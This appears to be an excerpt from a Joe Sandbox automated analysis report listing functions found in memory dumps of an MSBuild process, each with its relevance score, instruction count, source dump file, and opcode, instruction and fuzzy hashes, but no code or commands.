                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 39118F70F142548FCB48DBB8D8546AE7BF6EFCA710B1144AAD106DB390DB34AD45CBA1
                                                                                                                                                                                                                                                Function 071B3AC1 Relevance: .1, Instructions: 58COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 9b35d500052a50ff6f28da9df96ab43a1a7b97366f6399bcdb3b6bcb498430b8
                                                                                                                                                                                                                                                • Instruction ID: ccd27338b72f0bf861899422c8ef6bfa283af5a477a80626d4131506a66e52e6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9b35d500052a50ff6f28da9df96ab43a1a7b97366f6399bcdb3b6bcb498430b8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A119DB4A002069FC721CB69C644BAAFBE5FF04324F44856AD458DB692E374E951CF80
                                                                                                                                                                                                                                                Function 07095AA8 Relevance: .1, Instructions: 58COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 68081bbc2a0fd0c60c8d5fdc0f71e1fbf9c36361dcd175e2466984ab280cf74c
                                                                                                                                                                                                                                                • Instruction ID: 8792e488d4f5e8f2dec54e509b1833402e8343fa0d5968da8fe208ff7627dc30
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 68081bbc2a0fd0c60c8d5fdc0f71e1fbf9c36361dcd175e2466984ab280cf74c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AF114C302007466BD725DF35D88095ABBE2EFC26347148A6DD05A8F292DBB1FD0A8F95
                                                                                                                                                                                                                                                Function 072ACF38 Relevance: .1, Instructions: 58COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: f94af5369c79e067d8abc1f5c3d8d15f6a568b2d4fb5a77e4a11f4e7928e791b
                                                                                                                                                                                                                                                • Instruction ID: 8f7445050e75fea94bddc30d082f155481a8a8acf9a6c9c81eff03577b2ab95b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f94af5369c79e067d8abc1f5c3d8d15f6a568b2d4fb5a77e4a11f4e7928e791b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 19113C313053129FC345DFA4E41049AB7A7FF8922531495AAE60ACF746CA35EC91CFE5
                                                                                                                                                                                                                                                Function 0711A730 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672543242.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7110000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: ee32fc8563fd8ccbd8ac325942f93c09557c4cfe19d5620292b2d5e6d5c7c601
                                                                                                                                                                                                                                                • Instruction ID: 28bf4dbbdc5563dc4404e00b398d30a790b21d058cfe63d71016c272a5a10f2c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ee32fc8563fd8ccbd8ac325942f93c09557c4cfe19d5620292b2d5e6d5c7c601
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CB118872310215AFD714DF94EC44EAB77EAFB84760F14852AF615DB280DB72E9058BA0
                                                                                                                                                                                                                                                Function 0711D118 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672543242.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7110000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 1cb7c3b3fc774b4ad75c3844102a404dc31f66389afd02cd51cf1a9e2dd03590
                                                                                                                                                                                                                                                • Instruction ID: f98d1f62fbd901854ef85ad7056cb6f441fe033fa1d65fabf0a1af9a040089f9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1cb7c3b3fc774b4ad75c3844102a404dc31f66389afd02cd51cf1a9e2dd03590
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A7117FB1610709AFD715DF64D880A8EBBF1FF84320F008A29D4499B651E770FA09CBD6
                                                                                                                                                                                                                                                Function 070967A0 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 31cf1d7e6335320909d83d8cd4ee9723797ccc3f14d534f908ce8e32d0d55b5d
                                                                                                                                                                                                                                                • Instruction ID: 722d9fae788ef8123ff03bd312d1740cc8eddc86108efb6dae2b0311c3dc7ece
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 31cf1d7e6335320909d83d8cd4ee9723797ccc3f14d534f908ce8e32d0d55b5d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EB118CB17007169FDB24EB69D484A6AB7F6FFC4620710462DE9468B300EB76ED028B95
                                                                                                                                                                                                                                                Function 072A3848 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 2f80397f41168c7274c421029ca1e03c13e13f6798b2fb14e2ffd4ff2821390c
                                                                                                                                                                                                                                                • Instruction ID: 05d1b5cfbb1c86d1f30b2f40adbbc7aa3e5eabeda42339fea5bdfaecd6e330e0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2f80397f41168c7274c421029ca1e03c13e13f6798b2fb14e2ffd4ff2821390c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 481182B5310206BFD715DE65D840BAB7BA6EB88320F14C429E6058B381DB71ED45CB90
                                                                                                                                                                                                                                                Function 0711A728 Relevance: .1, Instructions: 54COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672543242.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7110000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 9650727b01fe9de5315fad318abb1e7786d843db357ee9d005f369376fd8c8ab
                                                                                                                                                                                                                                                • Instruction ID: e91c2bdac222cf89de2001d057e3d9f0d36a33e4db7c300e71205c95544dd584
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9650727b01fe9de5315fad318abb1e7786d843db357ee9d005f369376fd8c8ab
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CA11A171700205AFD714DFA4DC84FAA7BEAFB88720F148519F615DB280DB72E9018BA0
                                                                                                                                                                                                                                                Function 071B67F9 Relevance: .1, Instructions: 54COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: b87807b9544dc4aef058f8b836cdd3a7afa74ebe65743a8e84b3638cb107933b
                                                                                                                                                                                                                                                • Instruction ID: 87d5f5bd0c8d2d99b9ef4e61783259e5113ddfbc4e40a3b98ad16d998e6c6d57
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b87807b9544dc4aef058f8b836cdd3a7afa74ebe65743a8e84b3638cb107933b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F11190756002459FC700DF68C844E9ABBF2FF89324B158199E9098B362CB71ED16CB91
                                                                                                                                                                                                                                                Function 0711D128 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672543242.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7110000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 65b3bd77f6322a53e5d46190753a71424326e1ec3ceac9b1d837024a6c6db6c4
                                                                                                                                                                                                                                                • Instruction ID: 3094921cad33e1df9a55bee914c27b666636b6f4f2e88147d4f0d468cc157b82
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 65b3bd77f6322a53e5d46190753a71424326e1ec3ceac9b1d837024a6c6db6c4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DE115E7160070AAFD714DF64D88098EF7F1FF84320B008A29D4599B651EB70FA08CBE5
                                                                                                                                                                                                                                                Function 072AC1CF Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 20c3c80e79b02c715d5f3d1070a385882a4a5b887490d36a6e5298c06ac6071e
                                                                                                                                                                                                                                                • Instruction ID: a311921e665a30a811cc176dd046bd3c87513c135d6b7d80144c7b688136b898
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 20c3c80e79b02c715d5f3d1070a385882a4a5b887490d36a6e5298c06ac6071e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DD01F7767092125BDB029AA9B4116EABBE5CBC53707058067D805CB340DA26DC85C7A4
                                                                                                                                                                                                                                                Function 071167C0 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672543242.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7110000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 50fa214dd395afcef98074634ec401b72fcd6e25ab5b7c61a2edaf83d473b321
                                                                                                                                                                                                                                                • Instruction ID: 84f394167ac9d5bcc3f2fc0613cef7a50bf4a24b17faba88fe8e73440df403ae
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 50fa214dd395afcef98074634ec401b72fcd6e25ab5b7c61a2edaf83d473b321
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B80192B1B04710AFC321DA29CC41A5AB7E9EF89660B114265EA15DB3E0DB31DC0187A1
                                                                                                                                                                                                                                                Function 071B4CE9 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 5ee74de6640099262e36c37692ddba4838fb40d83266a36429ab5b846218a207
                                                                                                                                                                                                                                                • Instruction ID: 9e61c70ebd1c0eda635e0b3cbaadd1d54f0d7fc62af8fbf6752bb50091ce1386
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5ee74de6640099262e36c37692ddba4838fb40d83266a36429ab5b846218a207
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2201C475B00216EFCF109FA4D8049AFBBFAEF88351F04852AE909D7251D7359901CBE0
                                                                                                                                                                                                                                                Function 072A2D90 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 2c9f19d1fa903d42ce3b6c75ee7fe4a4887a0d6ce7fbc61af8ff9a20dc6c78fc
                                                                                                                                                                                                                                                • Instruction ID: c42eaee56ee341f168f40557265dfb0ad5acf09190ced7a690f663cdaef30aa7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2c9f19d1fa903d42ce3b6c75ee7fe4a4887a0d6ce7fbc61af8ff9a20dc6c78fc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E201D8B6B00219AF8B20DAA9EC409BFF7FDFBC8610B00443AE515D3240DB30991587A1
                                                                                                                                                                                                                                                Function 072A7A78 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 21e0be3af9810a0c5dffc3cdfef39fea5729b7cbb8c008f4946ff5cc41425e2f
                                                                                                                                                                                                                                                • Instruction ID: 196f7730c7fb36afeecab11a5d152d099fb6d1ad7048c22f36bd4dc810c929e9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 21e0be3af9810a0c5dffc3cdfef39fea5729b7cbb8c008f4946ff5cc41425e2f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D111A5B5600245AFCB15CF69E8405EEBFF2FF89260F14466AE9059B311E7709E148BE1
                                                                                                                                                                                                                                                Function 0711CD5B Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672543242.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7110000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: acdf5ae185a8d385e7cd35565cac6d69e6a98e4e056786d502aea4c5e062d7a6
                                                                                                                                                                                                                                                • Instruction ID: cdd41f874f2a635794cb9a4bbb3f3f27b608f4b10482bc1c53384d3f4e7c698d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: acdf5ae185a8d385e7cd35565cac6d69e6a98e4e056786d502aea4c5e062d7a6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DB0126F97447918FD7268E68D4803A6BFB2EB95610F18897AC0098B681D735D445DBE0
                                                                                                                                                                                                                                                Function 0711EC10 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672543242.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7110000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 8aed28647906201a28673f875c6f4862bed40b54d9ccb91f37c8446acbb73c3c
                                                                                                                                                                                                                                                • Instruction ID: ef579abee5cfca4231877f22902e3b3a4495ffc15470bcb53fa96cdcd99e0ebb
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8aed28647906201a28673f875c6f4862bed40b54d9ccb91f37c8446acbb73c3c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A701F93270020467DB209E94CC50F6FB7B6FB88750F104529EA169B2C0DA71AD158B91
                                                                                                                                                                                                                                                Function 0709CFE1 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 412cc7ee0ea750c2383be5f262350e6194d2a9da861f58372f70ea01fe6e930a
                                                                                                                                                                                                                                                • Instruction ID: 22f4547159bcad5a0fd9d1fb83f6115aae3521c95ccc57e3236c92215763231c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 412cc7ee0ea750c2383be5f262350e6194d2a9da861f58372f70ea01fe6e930a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CD014C703043455FC716E769D8A09EEBBE7EFC6220314455DC046CB291EF30AD0687B2
                                                                                                                                                                                                                                                Function 07095AB8 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 580b99c9d9ebc26f4d1a59d16c2fa06a1ae95de315d8d2fcff0066d8b5c0fa42
                                                                                                                                                                                                                                                • Instruction ID: 249537e77de8557482cebc29899a72e84975361d2c0e542e29cc3dc3625b92c2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 580b99c9d9ebc26f4d1a59d16c2fa06a1ae95de315d8d2fcff0066d8b5c0fa42
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 60112E70200706ABD715EF25D88089AB7E7EFC16343148A2DD45B4B651DF71FD0A8F95
                                                                                                                                                                                                                                                Function 072A8008 Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 8d162807d2dd93a4eab255d4c03f4a613a402713b5526f2d4708b7ee4df4451c
                                                                                                                                                                                                                                                • Instruction ID: bc75703e35a482ed572fff288e6ca80a964b31329f34c5c1b74bf87488e981fb
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8d162807d2dd93a4eab255d4c03f4a613a402713b5526f2d4708b7ee4df4451c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B2F068B2304112AB97215A5FF84455FF7DFEBD8776314803BE609C2500DFB5980285A9
                                                                                                                                                                                                                                                Function 0711DBD0 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672543242.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7110000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: e1c856b79a6254faa0560e9884f7b32c483ef7c68e1501047b0ecbac3b540b4b
                                                                                                                                                                                                                                                • Instruction ID: ddab5b245da1e8d291a9bcca48c642ec0f55d189c2761cbb023efe86ec4edcc4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e1c856b79a6254faa0560e9884f7b32c483ef7c68e1501047b0ecbac3b540b4b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 491103712047499FD725DF25E88098B77E5FF84620B008A29E4498B625EB74FD098BA5
                                                                                                                                                                                                                                                Function 071BFE40 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: c36108aff4af20937c23e80dc800c366b096ff71f31219c3698798e7888e7d37
                                                                                                                                                                                                                                                • Instruction ID: 00e3085fc9457f894e225a645e8be0280c7b4ec2944bd9023c112632be7f711d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c36108aff4af20937c23e80dc800c366b096ff71f31219c3698798e7888e7d37
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 500184B1B001199BDB10DAA9EC40AFFF7EDEBC8650F10403AE504D3280DB70991587A1
                                                                                                                                                                                                                                                Function 071B4CF8 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: c72fe160b085994eba3945a698256cc4446702e6c162c027249e6b1b687e846e
                                                                                                                                                                                                                                                • Instruction ID: 6458f7638d54ba9ca3de763e08397df270fecb786399bcb8ffdfcf7446121e32
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c72fe160b085994eba3945a698256cc4446702e6c162c027249e6b1b687e846e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F5116175700216EFCB54DFA4D8488AEBBFAFB88351B148225E909D7250DB359901CB90
                                                                                                                                                                                                                                                Function 071B6808 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 3491d6ea80ca6b656e7473fdaeb8988a560493674d5bcd8f527c75c1580a1fc2
                                                                                                                                                                                                                                                • Instruction ID: 2402e392bac1055103dd30a4ecfd3514ea04d6813f1c62b906adc32ff413c098
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3491d6ea80ca6b656e7473fdaeb8988a560493674d5bcd8f527c75c1580a1fc2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CB1170756002059FC704DF68D884D9EBBF6FF89324B258199E819CB362CB71ED56CB90
